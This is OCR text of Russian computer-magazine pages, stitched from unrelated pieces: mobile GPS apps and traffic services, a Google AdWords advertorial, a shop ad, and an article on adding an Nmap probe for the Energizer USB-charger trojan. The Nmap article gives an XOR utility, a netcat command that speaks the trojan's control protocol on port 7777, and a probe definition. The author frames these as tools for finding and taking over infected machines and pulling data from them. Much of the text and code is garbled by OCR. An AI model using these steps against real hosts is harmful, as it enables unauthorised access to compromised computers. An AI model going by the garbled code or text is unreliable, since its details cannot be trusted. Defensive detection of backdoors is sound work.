ЯНДЕКС.ПРОБКИ 

Если расположение контакта постоянно обнов- 
ляется, а он как был посреди дороги, так там и 
остается, ему можно только посочувствовать. 
Приятель встрял в пробку. Существуют различ- 
ные способы для отслеживания ситуации на 
дороге: сводки различных оперативных служб, 
камеры и детекторы с автоматическим ана- 
лизом картинки, сообщения от энтузиастов и, 
конечно же, софт, использующий ЕВЗ-сервисы. 
Команде Яндекса за многие вещи можно 
выражать респект, но лично от меня — боль- 



Определение координат без 0Р5? 



Любая из базовых станций имеет некоторый набор параметров, которые получает 
телефон, благодаря чему каждую БС можно распознать. Один из таких параметров — 
СеІІЮ (сокращенно СЮ) — уникальный номер для каждой соты, выданный оператором 
Существуют базы, в которых для каждого СЮ указаны его координаты. Чем больше ты 
знаешь о базовых станциях вокруг, тем более точно можно провести расчет текущего 
месторасположения. Точность варьируется от нескольких сотен метров до нескольких 
километров, но это неплохая отправная точка, чтобы разобраться с координатами. 

Ты наверняка обратил внимание, что мобильные инструменты того же Ооодіе могут 
очень лихо определять месторасположение человека. Значит, данные у него есть. Но 
откуда? Источников много, но и мы в этом помогаем. Мало кто читает соглашение об 
использовании, но на самом деле, устанавливая программу, мы соглашаемся отправ- 
лять информацию о подключенной СеІІЮ и текущих координатах (если включен 0Р5]. 
Подробнее о том, как обращаться к этой базе, читай в нашей статье «Навигация без 
ОРЗ» (РБЕ-версия будет на диске). 
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ШДРШ 7:36 РМ 




Интерфейс Роигзциге 



шое спасибо за Яндекс. Пробки. Разработав мобильное приложение 
Яндекс. Пробки [ ШрУ/тоЫІе.ѵапбех.ги/тарз ). ребята публично сделали 
доступным то, чего во многих странах не существует даже у оператив- 
ных служб. У пользователя на телефоне появились не только карта и 
возможность проложить маршрут, но и постоянно обновляемая инфор- 
мация о ситуации на дорогах, привязанная к этой карте. Более того, 
он сам участвует в сборе данных о движении на дорогах. Приложение 
периодически передает на сервер текущие координаты и скорость. 

Если несколько человек движутся в одном направлении по одной и 
той же улице со скоростью 40 км/ч, значит, улица свободна, и ее можно 
пометить зеленым цветом. Если же, наоборот, в каком-то месте все 
еле ползут, то участникам рассылается обновленная информация с 
«красными» участками дороги. Те же самые данные отображаются и 
на онлайн-сервисе Яндекс. Карты. На этом возможности комьюнити не 
заканчиваются. Видишь аварию или дорожные работы? Как же они 
заколебали! Один клик мыши — и информация ушла на сервер, откуда 
ретранслируется для всех. Можно долго ругать Яндекс. Пробки за то, 
что они врут и берут данные с потолка, но такой подход действительно 
работает и позволяет внести хоть какую-то толику контроля за ситуаци- 
ей. Зачем ехать по улице, где даже по этому сервису — непроходимая 
пробка? К тому же, данные Яндекса используются и программами 
навигации, которые умеют вычислять маршрут, учитывая ситуацию на 
дороге. Мобильные Яндекс. Карты поддерживают платформы ѴѴіпсІоѵѵз 
МоЬіІе, ЗутЬіап, Чаѵа, АпбгоісІ и ВІаскЬеггу и позволяют посмотреть 
карты более 130 городов России, Украины и других стран. Функция 
пробок доступна только для нескольких городов, но это, возможно, к 
лучшему — значит, где-то еще можно свободно передвигаться по горо- 
ду. Москвичам, какособо пострадавшим, расскажу один хинт: чтобы 
не тратить лишний (ЗРР5-трафик, лучше скачать карту Москвы с сайта 
Яндекса и сохранить ее в телефоне. 
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Составление инфор- 
мации о дорожной 
ситуации в реальном 
времени 
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Карты в ѴѴаге создают- 
ся самими пользовате- 
лями во время езды 




давать и вносить изменения в карты на основе ѵѵікі-системы, в том 
числе с помощью загрузки своих ОРЗ-треков (логов передвижения, 
записанных ОРБ-софтом]. Сейчас сервис может похвастаться очень 
неплохим покрытием, к тому же именно его использовали во время 
спасательных работ на Гаити. С его помощью всего за пару дней 
сумели создать подробные карты областей острова, пострадавших 
в результате землетрясения. Проект ѴѴаіе ( ѵѵѵѵѵѵ.ѵѵаге.сопп ) намного 
более молодой, а потому использующий более современные подходы 
проект. По сути, это программа для навигации с отображением дорож- 
ной ситуации, но с большим отличием от всех остальных: карты для 
нее составляют сами пользователи — так называемые вейзеры. Во 
время движения ѴѴаге записывает трек и периодически отсылает его 
на сервер. Если по этой дороге проедет еще хоть один пользователь, 
то дорога считается подтвержденной и появляется на карте. За про- 
кладку дорог вейзеру начисляются очки. Наименования улицам также 
дают пользователи; за это можно получить дополнительные пойнты 
(здесь система чем-то похожа на ОрепЗіхееіМар). Как и в Яндекс. 
Картах, водители могут посылать на сервер информацию о пробках, 
ДТП, стационарных камерах-радарах и полицейских засадах. Причем 
для каждого события можно оставить комментарий или, например, 
опровергнуть сообщения — все это делается через удобный кли- 
ент. Я использовал версию для АпбгоісІ, но есть также реализации 
для іРЬопе, ѴѴіпсІоѵѵз МоЬіІе и ЗутЬіап. Что касается покрытия карт, 
то именно для России оно довольно скудно. Причина очевидна — 
маленькое комьюнити, но именно мы с тобой можем его увеличить. 
Если прямо сегодня начать отрисовывать карты вместе, особенно в тех 
местах, где ни одна онлайн-карта еще недоступна, то покрытие можно 
довольно быстро увеличить в разы. 

МОБИЛЬНЫЙ ПЛАНЕТАРИЙ 

Впрочем, что это мы все о дорогах, да о дорогах. Давай поговорим 
о звездах! Помимо ОРЗ-модуля многие производители встраивают 
в телефон еще и акселерометр (это не такой дорогой модуль), кото- 

Установка свежих версий зесигііу-программ 
в один клик 



ШІЕ 

Понятно, что чем больше пользователей отправляют информацию 
о своих передвижениях, тем точнее будет информация о пробках. 

Но когда пользователей очень много, можно пойти на большее — с 
их помощью создавать саму карту. Проект ОрепБігееіМар ( ѵѵѵѵѵѵ. 
орепзТгееТтар.ога ) появился давно и позволяет всем желающим соз- 
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Компьютеры Утбис' на базе 
процессора Іп+еІ® Соге™ і5 
содержит в себе ВСЁ, 
что необходимо Вам 
как для качественной 
и быстрой работы, так 
и для полноценного 
отдыха! г ,псе 






Адрес: 614022, г. Пермь, ул. Подводников, 9 
Тел.: /Факс; (342) 290-97-76, 224-22-06, 220-08-06 
сайт: ѵшѵѵ.иіЬіг.ги, ммллсіідіі'аі-сіот.ги 
эл. почта: заІеФиіЪіз.ги 



Быстрее. 

Умнее. 



Іпіеі, ІпІеІ Соге, ІпіеІ Соге Оио являются товарными знаками, либо зарегистрированными товарными знаками, 
права на которые принадлежат корпорации Іп|е! или ее подразделениям на территории США и других стран. 



Корпорация ІпІеІ не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений 
относительно конкретных компьютерных систем, упоминание о которых содержится в данной рекламе. 



Корпорация ІпТеІ ©2009г. Все права защищены. ІпіеІ, логотип ІпІеІ, ІпіеІ Соге и Соге являются товарными знаками на территории США и других стран. Реклама. 
*Другие наименования и товарные знаки являются собственностью своих зако иных владельцев. 






• Для того чтобы 
посмотретьзапи- 
си с ЕоигЗциаге, 
необходимо 
зарегист- 
рироваться. Если 
та ко го же л анияутебя 
нет, а посмотреть, 
чем живут пользова- 
тели, хочется, можно 
воспользоваться 
сервисом Ьипл/беге. 
сот . Это ка рта с 
нанесенными ком- 
ментариями юзеров 
ЕоигЗдиаге. 



• Компания ѴаЬоо 
рассматривает 
возможность при- 
обретения быстро 
набирающего попу- 
лярность стартапа 
Еоигздиаге за сумму 
около $1 00 млн. 
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Передача располо- 
жения удобна, если 
телефон украден. 
Онлайн-сервисы 
позволяют отсле- 
дить его и удаленно 
стереть с него все 
данные. Возьми на 
заметку: ііад.сот . 
уѵаѵезесиге.сот . 
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Мобильный планетарий от сотрудников 
боодіе 




Такие пробки в Москве— редкость, 
даже по показаниям Яндекс. Пробок :) 



рый используется для распознавания ландшафтного и 
портретного расположения телефона и еще миллиона 
вещей, на которые хватает фантазии разработчиков. 

Одни воссоздают игрушки вроде лабиринта, где нужно 
провести шарик до финиша, не засадив его в ловушки- 
отверстия. А другие используют акселерометр в связке с 
ОРЗ-модулем, получая убойную смесь разных технологий. 
Именно так и поступила команда энтузиастов из Ооодіе, 
разработавших приложение Бку Мар к>г АпсігоісІ ( ѵѵѵѵѵѵ. 
доодіе.сот/зкѵ/зкѵтар ). Получился мобильный плане- 
тарий. Идея программы родилась в умах разработчиков 
еще до официального появления платформы АпсігоісІ. 
Воодушевленные теми возможностями, которые будут 
в новых телефонах, включая ОРЗ, цифровой компас и 
сенсоры движения, они подумали, что круто было бы 
использовать эти фичи в мобильном приложении, кото- 
рое показывает картинку неба в зависимости оттого, где 
находится человек и куда он направил телефон. ОРЗ и 
часы позволяли генерировать карту для точного времени и 
расположения пользователя, а настоящих чудес позволяли 
добиться цифровой компас и акселерометры. Используя 
эти два сенсора, приложение может определить точное 
направление, куда направлен телефон, и в зависимости 
от этого отображать на экране только те звезды, которые 
попадают в его виртуальный фокус зрения. В результате, 
если ты хочешь узнать, что это за звезда так ярко светит на 
Востоке, то нужно просто навести туда телефон и увидеть 
на карте, что это Венера! Как тебе? Я проверял лично, 
выезжая на место, где нет высоких зданий и зарева города 
— Зку Мар реально работает! Работая в поисковом гиганте, 
ребята не могли обойти функцию поиска, причем в осо- 
бенно эффектной манере. Ты просто набираешь название 
планеты или звезды (или выбираешь картинку в галерее 
фотографий с телескопа Хаббл], и телефон сам показывает, 



куда его нужно навести, чтобы увидеть объект. Чем ближе 
ты к цели, тем краснее становится курсор с направлением 
и окружностью в центре. В конце концов, объект оказыва- 
ется в нем, и вуаля! Вот он, идеальный учебник астроно- 
мии. Жаль только, что приложение существует только для 
платформы АпсігоісІ (1.5 и выше], причем в девайсе для 
работы обязательно должны быть акселерометры. 

ИГРЫ С ВРЗ 

Акселерометры понадобятся и в совершенно новом 
виде игр, которые используют привязку к реальному 
расположению геймера. Одна из таких игр — ЗгбЕуе. 
Идея заключается в переносе ВРО стиля в реальный 
мир: тут также есть персонаж, но перемещается он не по 
виртуальному миру, а по реальному. Сюжет в игре пока 
прост: текущее местоположение отображается на карте 
(используется только СРВ, так как важна точность дан- 
ных], вокруг бегают различные существа, которых нужно 
истреблять. Истреблять придется вполне натурально: 
держа в руке телефон, необходимо реально обозначать 
удары. Это тебе не мышкой кликать. Нарвешься на 
толпу монстров — придется реально попыхтеть :]. Для 
считывания телодвижений используется акселерометр. 
Помимо этого можно сбивать врагов (прошу обратить 
внимание — виртуальных врагов] на машине, но опыта 
за это дается очень мало. Менее прогрессивная, но 
также использующая ОРЗ-приемник игра — Геокэшинг. 
Она существует в разных исполнениях, но смысл во всех 
вариантах одинаковый: найти по ОРЗ-координатам и 
подсказкам нужное место и спрятанный там тайник. В 
качестве локаций выбираются различные, в том числе 
опасные, места, например, заброшенные ракетные шахты 
и целые военные части. Если тебе интересно, добро пожа- 
ловать на мл/ѵѵ.деосасЫпд.соіті и российский проект ѵѵѵѵѵѵ. 
деосасЫпдт . ц-ц 
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10 СОВЕТОВ 

Молодцы те, кто уже успел воспользоваться ярким вкладышем от боодіе в нашем журнале. Все-таки 
1000 рублей, которые реально можно потратить на рекламную кампанию любого сайта, просто так на 
дороге не валяются. Хотя это не главное. Когда бы ты еще мог попробовать продвинутый инструмент для 
размещения контекстной рекламы в действии? А тут все возможности АбѴѴогбз к твоим услугам: пробуй - 
не хочу. Но, чтобы предостеречь тебя от возможных ошибок, мы подготовили несколько советов, которые 

позволят работать с системой наиболее эффективно. 



Для успешной реклам- 
ной кампании необходи- 
мо иметь четкое понима- 
ние своих целей и потребностей 
целевой аудитории, которые будут 
отражаться в рекламных объявле- 
ниях. Не нужно стремиться вста- 
вить все рекламируемые услуги/ 
товары/сервисы в одно объяв- 
ление: куда эффективнее будет 
сделать несколько различных. 
Например, если стоит задача по 
рекламе автосервиса — то услуги 
выездного шиномонтажа, ремонта 
автостекол и продажи 6/уАКПП 
необходимо оформить в 3 раз- 
личных рекламы, у которых будут 
совершенно разные аудитории, 
цели и ключевые слова. 

Важно, чтобы сама структура рек- 
ламной кампании отражала струк- 
туру рекламируемого сайта или 
различные направления бизнеса. 

Помни о возможности 
использования геогра- 
фического и временного 
таргетинга. К примеру, если ты 
продаешь дешевый товар в Туле, 
то им никогда не заинтересуется 
покупатель из Владивостока. 
Помимо рекламы на страницах 
поиска Воодіе, через АсіѴѴогсіб 
ты можешь размещать рекламу 
и на партнерских сайтах, причем 
есть возможность самостоятельно 
выбрать наиболее интересные 
площадки. 

Позиция твоего объяв- 
ления зависит от ставки, 
которую ты готов запла- 
тить и показателя качества (диаШ:у 



зсоге), который формируется на 
основе нескольких параметров: 
СТР объявления, качества целе- 
вой страницы, истории аккаунта 
и т.д. Если в блоке 3 позиции, 
а объявлений десять, то будут 
показаны трое самых лучших. 
Соответственно, твое объявление 
будет показываться далеко не 
всегда. Контролировать види- 
мость своей рекламы можно с 
помощью «Инструмента диагнос- 
тики объявлений». 

М Подбирать слова для 
I Ми объявления надо особо 
^Хтщательно. Помочь в 
этом деле и оценить предстоящие 
расходы поможет специальный 
«Инструмент подсказки ключе- 
вых слов». С помощью АсіѴѴогсіб 
ты можешь создать несколько 
рекламных кампаний, в каждой 
из которых будет свой список 
ключевых слов. Не занижай сам 
себе СТР миксованием запросов 
абсолютно различного смысла, 
таких как, к примеру, «ремонт 
сайлентблоков» и «покупка плю- 
шевых игрушек». 

В заголовке объявления 
лучше всего указывать 
тот запрос, который ты 
собираешься продвигать, боодіе 
считает такие объявления более 
релевантными. Используй в 
объявлении релевантные клю- 
чевые слова, на которые реаги- 
руют потенциальные покупатели: 
«дешево», «бесплатно», «быстро». 
Нужно помнить и о возможности 
отображать рекламные ссылки 



только в случае точного совпаде- 
ния поискового запроса с ключе- 
выми словами. Для этого исполь- 
зуют квадратные скобки вокруг 
ключевых слов: [пример]. Кстати 
говоря, ключевые слова, которые 
используются в объявлении, будут 
выделены жирным шрифтом, что 
привлечет дополнительное вни- 
мание пользователей. 

Старайся оттолкнуть от 
объявлений тех, кто не 
готов совершить покуп- 
ку, а просто праздно интересует- 
ся. Хорошая идея — обозначить 
в рекламном объявлении цену 
на товар, которая, во-первых, 
отвадит пустых «кликалыщи- 
ков» от объявления, а во-вто- 
рых, понизит среднюю цену за 
привлеченного покупателя. Не 
пугайся, что СТР при этом слег- 
ка уменьшится — так и должно 
быть. Зато человек, перешедший 
по объявлению с указанной сто- 
имостью, потенциально может 
позволить себе покупку. 

При создании кампании 
разумно использовать 
минус-слова, чтобы 
исключить показы объявлений 
при не совсем релевантных 
запросах и отсеять ненужный 
трафик, тем самым повысив СТР. 
Например, если ты рекламиру- 
ешь компанию, которая занима- 
ется восстановлением данных, то 
тебе мало интересны люди, кото- 
рые ищут софт для баіа гесоѵегу, 
поэтому в качестве минус-слова 
можно поставить «скачать». 



Необходимо правильно 
выбрать целевую стра- 
ницу, на которую будет 
ссылаться объявление. Чем выше 
будет релевантность твоего объ- 
явления с поисковым запросом 
пользователя и той страницей, 
на которую он попадет, тем выше 
будет позиция объявления в 
рекламном блоке. К тому же, 
клиенту важно оказаться там, где 
он сразу может воспользоваться 
услугой, а не блуждать по внут- 
ренним ссылкам. 

Для статистики пере- 
ходов через боодіе 
Апаіубсз добавляй в 
конец ссылки на целевую страни- 
цу уникальный тег, который будет 
принадлежать данному объявле- 
нию, это поможет в дальнейшем 
легче анализировать полезные 
объявления и те, от которых 
нужно избавиться. 

На сайте АсіѴѴогсіб 
собрано огромное 
количество материалов 
по созданию и управлению рек- 
ламными кампаниями с помощью 
АсіѴѴогсіб. Особенно рекомендуем 
«Руководство для начинающих» 
для того чтобы лучше разобрать- 
ся, как максимально повысить 
эффективность и при этом 
сократить расходы. Так же для 
желающих узнать больше о том, 
как работает АсіѴѴогсіб существует 
блог АсіѴѴогсіб, ѴоиІиЬе канал с 
образовательными видео, онлайн 
школа АсіѴѴогсіб и телефонная под- 
держка: +7 495 780 0022. 












РЕКЛАМА 




прокачать Ишар? 



Реализуем собственные проверки 
в известном сканере безопасности 



Представлять Мшар читателю ][ сродни тому, что объяснять физику-ядерщику, 
что такое заряженная частица. Мшар знают все, и скорее всего даже хотя бы 
разок им пользовались. Но вот парадокс: ту изумительную по расширению 
архитектуру, позволяющую заточить сканер под себя, все упорно обходят 
стороной. И совершенно напрасно. 



Е сли ты следишь за обновлениями 
легендарного сканера, которые, 
кстати говоря, в последнее время 
выходят особенно часто, то должен 
был обратить внимание на две 
цифры, которые фигурируют в каждой записи 
сбапдеіод'а. Первая означает количество 
обновленных сигнатур для определения 
сервисов и операционных систем. А 
вторая — количество новых І\І5Е-скриптов 
для реализации более тонких проверок и 
интеллектуального сканирования. Обычно 
такие скрипты разрабатываются для какой- 
нибудь серьезной уязвимости и используют 
части оказавшихся в паблике сплойтов. Но 
то, что оказалось у всех — это уже не так 
интересно. Другое дело — сделать что-то 
для себя. Скажем, зная о том, как устроен 
какой-то свежий троян, добавить в сканер 



определенные проверки и таким образом, 
быстро прочесав сеть, порутать сразу 
множество машин. Кактебе? 

РШ6ЕКРРШШ6 СВОИМ РУКАМИ 

Конечно, можно написать с нуля программу- 
сканер, которая будет отправлять некий 
запрос, парсить результат и, в конечном 
счете, возможно, детектировать заражен- 
ные машины. И реализовать некое подобие 
многопоточности тоже несложно. Но разве 
все это может сравниться с теми механиз- 
мами, которые столько времени оттачи- 
вались в ІМтар? Я так не думаю. Одна из 
ключевых особенностей сканера — широкие 
возможности бпдегргіпііпд'а, то есть как 
раз определения версии ОС и работающих 
сервисов по так называемым отпечаткам 
пальцев (в терминах ІМтар они называются 



ргобе). Сервисом может быть обычный ѴѴѴѴѴѴ- 
демон, а может — трой. При этом абсолютно 
необязательно мириться стой базой, которая 
по умолчанию поставляется со сканером. 
Посмотрим, как можно обновить ее самому. 

В качестве примера возьмем троян, который 
распространялся в Европе с софтом для заря- 
док от компании Епегдігег (мы рассказали о 
нем в Медапеѵѵз прошлого номера]. На офи- 
циальном сайте программа уже обновлена, но 
зараженный вариант по-прежнему доступен 
в снимках сайтов, сохраненных архиватором 
интернета ѴѴауЬаск МасЫпе [ ѵѵеЬ.агсЫѵе. 
огд ). Заниматься глубоким реверсингом мы 
не будем. Хотя расковырять трой достаточ- 
но просто (автор не сильно заморачивался, 
чтобы хоть как-то закриптовать малварь), это 
уже сделали за нас. На сайте ѵѵѵѵѵѵ.зѵтапіес. 
сот/соппесі/ЬІоазЛгоіап-ІюипсІ-изЬ-Ьаиегѵ- 



► 026 
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сбагдег-БоЛѵѵаге приведено подробное 
описание вируса, из которого нам интересны 
несколько фактов: 

• троян слушает 7777 порт; 

• любые данные, которые троян принимает 
на этот порт, ХОР-ятся со значением 0хЕ5 
перед тем, как обрабатываются далее; 

• команды (запуск процесса, удаление 
файла, выполнения команды и т.д.) пере- 
даются в виде С1_5Ю (уникальный иденти- 
фикатор вида {ХХХХХХХХ-ХХХХ-ХХХХ-ХХХХ- 
ХХХХХХХХХХХХ}); 

• перед командой передаются 4 управляю- 
щих байта, в которых указывается длина 
управляющего сообщения. 

Одна из таких команд — "{Е2АС5089-3820- 
43і : е-8А4^-А7028ЕА^8С28} ,, — проверяет, акти- 
вен троян в системе или нет. Если вирус при- 
нимает и понимает ее, то в ответ он отправ- 
ляет текст «ѴЕ5», который также, как и сама 
команда, ХОР'ится символом 0хЕ5. Похоже, это 
как раз то, что поможет нам выявить наличие 




В новой версии Ытар даже не 
надо добавлять нашу пробу — 



отпечаток для изученного троя- 
на там уже есть! 



трояна на удаленной системе. Итак, мы знаем, 
что отправлять (команду для проверки актив- 
ности], куда отправлять (порт 7777] и что долж- 
ны получить («ѴЕ5»); осталось реализовать 
проверку. 

ВСЕ ОК? ѴЕЗ! 

Для начала попробуем отправить пакет с 




Стандартный ЫБЕ-скрипты Нтар 



командой на порт 7777 вручную. Для этого 
нам понадобится утилита пеісаі (с ѵѵѵѵѵѵ. 
зесигіМосиз.сотЛооІз/1 3 можно скачать 
ее портированную версию под ѴѴіпсіоѵѵб]. 
Поскольку троян ожидает данные в закрипто- 
ванном с помощью ХОР'а виде, то придется 
выполнить такое шифрование. Напишем для 
этого предельно простую утилиту на Си, хотя 
то же самое за минуту можно сделать и на 
любом другом языке. 

#іпс1исІе <зСс1іо.Ь.> 

іпС шаіп(іпС агдс, сЬаг *агдѵ[]) 

{ 

іпС с; 

иМ1е( (с = деСсЬагО) != ЕОЕ) 
ргіпСП ( " %с " , с А 0хЕ5) ; 

геСигп 0; 

} 

Все просто: тулза читает символы из стан- 
дартного потока вывода, далее для каждого 
символа осуществляет операцию "ХОР 0хЕ5" 
и результат, то есть закр и пто ванный текст, 
отправляет в поток вывода: 

$ дсс -о Дезе СезС.с 
$ есЬо " Йііз із а СезС" I . /СезС I 
Лехсіитр -С 

00000000 91 8с1 8с 96 с5 8с 
96 с5 84 с5 91 80 96 91 еі 

I ... .А. .А. А. . . . і | 

Все хорошо, кроме одного момента — в конце 
у нас нарисовался лишний символ — ОхЕЕ, 
который означает перевод строки. С другой 
стороны, не хватает терминального симво- 
ла завершения строки. Поэтому запускаем 
команду есбо с ключом "-п", чтобы избавить- 
ся от перевода строки, и ключом "-е", чтобы 
та распознала езсаре-символ м \х00", который 
мы добавим в конце сообщения: 

$ есЬо -пе "СЫз із а СезСХхОО" I 
. /СезС I Ьехсіитр -С 
00000000 91 8(1 8с 96 с5 8с 
96 с5 84 с5 91 80 96 91 е5 

I ... .А. .А. А. . . .а| 

Вот теперь все правильно. Осталось под- 
ставить нашу команду "{Е2АС5089-3820-43І : е- 
8А4О-А7028ЕАО8С28}", указав перед ней ее 
размер (38 символов самой команды + 1 тер- 



Реверсинг трояна от компании Зутапіес 

Апу ааіа та! Т гс^ап Агидігег гесеіѵез оп Шіз рог! і$ ХОК'й ѵют те ѵаіие 0хЕ5 Ье(оге II і$ ргосеззей (игтег 
ТПе тгеаі сопііпиоизіу Іізіепз Тог соттапйз Соттапйз аге зеп! То те тгеаі т те Тогш от СІ_5Юз ТИе 
тгеаі юаііз Тог апу от те Тоііомпд СІ_5Юз То Ье зепт 

• {Е2АС5089-3820-43Ге-8А40-А7028РА08С28} 

• {Р6С43Е1 А-1 551 -4000-А483-С36 1 969АЕС4 1 } 

• {ЕА7А2ЕВ7-1 Е49-4Р5Т-В408-06645В7440ЕЗ} 

• {783ЕАСВР-ЕР8В-498е-А059-Р0В5ВО1 2641 Е) 

• {01 7402РС-7СВ6-4а22-87С7-7ВВ72А32Р19Р} 

• {980958РС-СЮА2-4Т1 С-В841 -232АВ357Е7С8} 

• {4Р4Р0Э88-Е71 5-4Ы Т-В31 1 -61 Е530С2С8РС) 

• {384ЕВЕ2С-Р9ЕА-4Т6Р-94ЕР-С9020А58Р01 3} 

• {8АР 1 С1 64-ЕВ06-4Ь2Ь-ВС1 Р-64674Е98А7 1 0} 

5оте оТ тезе СІ_8Юз/соттапсІ5 Таке Тигтег рагатеТегз тат тизт Ье зепт аПег те С1.8Ю ЕасЬ 
соттитсаТюп зедиепсе сопзізТз от а 4 ЬуТез зіге ѵаЮе теп те соттапО теп (орТюпаііу) те зіге оТ те 
рагатеТегз апо ТПе асТиаі рагатеТегз 

ТГіе ТігзТ соттапй сЬескеО Тог і$ {Е2АС5089-3820-43Ге-8А40-А7028РА08С28} ТМз соттапр сЬескз та! 
еѵегутіпд і$ ОК ѵит те Тгоіап ІТ те соттапО із гесеіѵео апо ехесШеО соггесТіу Ьу те Тгоіап те ТехТ 
‘•Уез” із зепт Ьаск То те аТТаскег ТЬе гезропзез зепт Ьу те Тгс^ап аге аізо ХОЯ'О мт 0хЕ5 



Готовые библиотеки ІЧ5Е 



Чтобы сделать программирование скриптов на Еиа еще более эффективным, в ІЧтар 
встроено много дополнительных библиотек, специально заточенных под выполнение 
различных сетевых проверок. Все они находятся в папке %птар%/п5еІіЬ. Чтобы ты не 
изобретал велосипед, придумывая, например, как выполнить запрос к 0145, привожу 
список наиболее часто используемых библиотек: 

ЬасЫоог — простейшая реализация бэкдора в системе; 

Ьіп — работа с двоичными данными; 

ОаТабІез — библиотека для работы со встроенными файла ІЧтар (например, птар- 
ргоТосоІз — описанием и номерами портов различных протоколов]; 
сМаиИ — наиболее часто используемые сетевые сценарии; 
бпз — работа с 0145; 

ЬНр — работа с НТТР; 

тзгрс — библиотека для работы с вызовами М5РРС; 

тузці — некоторые операции с МуЗОЕ; 

пеіЬіоз — работа с ІЧеіВІОЗ-трафиком; 

птар — взаимодействие с ядром сканера; 

раскег — манипулирование с пакетами в РАѴѴ-виде; 

ргоху — работа с прокси; 

збогірогі: — работа с портами; 

зтЬ — работа с 5МВ-протоколом; 

555і/б 5Ь2 — работа с 55Н. 

Любые библиотеки подключаются с помощью команды гециіге. 
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Наш сценарий на Ы5Е 




Іептар позволяет создать профайл для 
сканирования, чтобы сохранить настрой 
ки сканирования 




> іпіо 

Информация 
представлена ис- 
ключительно для 
ознакомления. 
Использование ее 
в противозаконных 
целях может повлечь 
за собой уголовное 
преследование. 
Автор и редакция 
не несут никакой 
ответственности за 
истолкование данной 
статьи как руководст- 
ва к противозакон- 
ным действиям. 




> сіѵсі 

Надискеты найдешь 
последнюю версию 
ІЧтар, а также все 
разработанные нами 
скрипты и ргобе'ы. 



минальный символ = 39 байт, что в шестнадцатеричном 
представлении дает 27): 

есЪо -пе "\х27\х00\х00\х00{Е2АС5089-3820- 
43іе-8А4Б-А7028ЕАВ8С28} \х00" 

По идее, этот пакет должен вызвать ответ трояна. Для 
этого отсылаем вывод команд с помощью пеІсаЕа на 7777 
порт зараженной машины: 

$ есЪо -пе " \х27\х00\х00\х00 {Е2АС5089-3820- 
43 Пе-8А4Б-А7 02 8РАБ8С2 8 } \х00 " I 
. /ВезВ I # шифруем команду 
псаВ 192.168.1.123 7777 | # отправляем ее 

. /ВезВ # получаем результат 
ответ : 

УЕ8 

Да! Троя разговаривает с нами и говорит «ѴЕ5» — зна- 
чит, все работает! Как видишь, Епдегргіпбпд удаленных 
сервисов — это далеко не всегда очень сложно. 

СОЗДАЕМ РВОВЕ ДЛЯ ШР 

Теперь самое время перейти к тому, ради чего мы все 
это и затевали, а именно — созданию слепка для базы 
ІЧтар'а. Первое, что нам понадобится — это найти файл 
птар-зегѵісе-ргобез. Обычно он располагается в с:\ 
ргодгат ЯІезѴітар (/изг/збаге/птар или /изг/іосаі/збаге/ 
птар в случае с никсами]. Это самый обычный текстовый 
конфиг, в котором последовательно перечислены все 
ргобе'ы в специальном формате. Если выполнить послед- 
нюю команду, но не отправлять ее в пеісаі, то на экране 
появится зашифрованная команда, которую и нужно 
вставить в отпечаток: 

# Наш слепок для определения Епегдігег 
Вгсф ап 

РгоЬе ТСР Епегдігег % | \хС2\хЕ5\хЕ5\хЕ5\х9Е\ 
хАО \хВ7 \хА4 \хА6 \хВ0 \хВ5 \хВВ\хВС\хС8 \хВб \хВВ\ 
хВ7 \хВ5\хС8\хВ1\хВб\х83 \х80\хС8\хВВ\хА4\хВ1\ 
хАІ \хС8 \хА4 \хБ2 \хВ5 \хВ7 \хВВ\хАЗ \хА4 \хА1 \хВВ\ 
хАб\хВ7\хВБ\х98\хЕ5 I 
гагііу 8 
рогВз 7777 

таВсЪ. епегдігег ш | А \хЬс\хаО\хЬ6$ I р/ 
Епегдігег Ъасксіоог/ о/Ѵ/іпсІомз/ 
і / * * ВАСКВООК* * / 



Вот и все: Епдегргіпбпд база обзавелась новым слеп- 
ком. Обозначение нового элемента Епдегргіпбпд-базы 
начинается с ключевого слова РгоЬе, последователь- 
ность байтов обособляется "ц I" в начале и символом "1" 
в конце. Параметр гагііу указывает вероятность срабаты- 
вания проверки. Рогіз задает порты, на которые отправ- 
ляется проверяющая последовательность. С помощью 
команды таісб и регулярного выражения в Регі-стиле 
определяется отчет сервера, на который должен реаги- 
ровать ІЧтар. В результате ІЧтар будет отсылать пакет на 
порт 7777 аналогично тому, что мы только что сделали с 
помощью ІЧеІсаЕа. Если в ответ придет закодированное 
слово «ѴЕ5», то сканер определит присутствие троя в 
системе. Проверим это в действии: 

$ птар -зѴ -р7777 192.168.1.2 

ЗВагВіпд №пар 5.30ВЕТА1 ( ЪВВр : / /птар . огд ) 

№пар зсап герогВ Вог 192.168.1.2 
НозВ із ир (0.00024з ІаВепсу) . 

РОЕТ 8 ТАТЕ 8ЕКѴІСЕ ѴЕКЗІСЖ 

7777 /Вер ореп епегдігег Епегдігег 
Ъасксіоог ( * * ВАСКВООЕ* * ) 

Зегѵісе ІпВо: ОЗ: ЭДіпЪомз 

Таким образом, потратив совсем немного времени, мы нау- 
чили ІЧтар находить зараженные машины в сети. Важно, 
что такая проверка никакие выбивается из привычного 
образа использования ІЧтар. Для сканируемых хостов будет 
выполняться еще одна проверка, вот и все. Ты по-прежнему 
сможешь использовать все остальные возможности ІЧтар, в 
том числе и автоматизированные скрипты. 

№Е - НТО ЭТО? 

Стоп, что еще за автоматизированные скрипты? Я гово- 
рю о скриптовом движке ІЧтар Эсгірбпд Епдіпе (ІЧ5Е), 
который появился еще в 4.21 версии сканера, причем 
разработчики корпели над ним более 6 месяцев. По 
сути, в ІЧтар сейчас больше обновляется не само ядро 
сканера, а количество поддерживаемых ІЧ5Е-сценариев. 
Например, в последней доступной бете (5.30ВЕТА1) поя- 
вились 37 новых скриптов: сценарий бНр-ѵтѵѵаге-раІб- 
ѵиіп, позволяющий уводить гостевые машины из уязви- 
мых продуктов ѴМѵѵаге; тузді-етріу-раззѵѵогсі, который 
пытается найти базы с пустыми паролями для админа и 
анонимного пользователя, и т.д. Всего таких скриптов в 
ІЧтар 117, но это только в публичном доступе. На самом 
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Отличная оболочка для ІЧтар 

деле это отличный механизм на случай, когда к мощ- 
ным возможностям сканирования необходимо добавить 
больше интеллектуальности или интерактивное общение 
с удаленным сервисом. В нашем примере, создавая пра- 
вило для поиска хостов с трояном Епегдігег, мы смогли 
обойтись отправкой статического запроса и обработкой 
ответа. С другой стороны, можно было разобраться со 
всеми остальными командами троя и, написав несложный 
скрипт, выполнить последовательность команд, чтобы 
вытащить полезную информацию с зараженных систем. 
